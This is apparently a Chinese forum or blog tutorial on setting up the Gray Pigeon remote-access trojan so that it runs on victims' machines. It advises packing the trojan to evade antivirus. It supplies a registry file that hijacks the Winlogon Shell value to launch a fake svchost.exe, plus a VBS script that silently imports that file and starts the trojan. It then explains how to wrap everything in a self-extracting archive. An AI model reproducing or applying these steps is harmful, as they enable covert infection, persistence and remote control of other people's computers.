今天写一个木马小教程:
鸽子木马篇
鸽子是一个很好的远程控制软件, 效果如何就不多说了
生成鸽子服务端时, win98/2000/xp下写入注册表启动项
和win2000/xp下优化安装成服务启动项别勾上。
有利于做免杀, 简单得加个壳就可以卡巴等主流的杀毒软件, 壳到网上找找
只要去尝试就可以成功。 到本站上找也行:www.arpun.com
另外得给鸽子加个开机运行。
我们修改注册表
新建一个文本:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe %windir%\\svchost.exe"
后缀改成run.reg
再建一个文件
on error resume next
dim ws
set ws=wscript.createobject("wscript.shell")
ws.run "regedit -s run.reg",0
ws.run "svchost.exe",0
后缀改成svchost.VBS, 是一个简单的VBS脚本。
一个注册表文件和一个VBS脚本, 自已体会一下, 不懂的上网看看资料。
再加鸽子的服务端一共三个文件。
创建一个自解压压缩包。 (建议别用捆绑器。 还可以用系统自带的:iexpress)解压后运行svchost.vbs
每次系统启动后都会开机运行。
一个简单实用的木马就好了。
隐藏性较高。 还有些更高级的方法, 下次再写个教程。
作者:小白。
……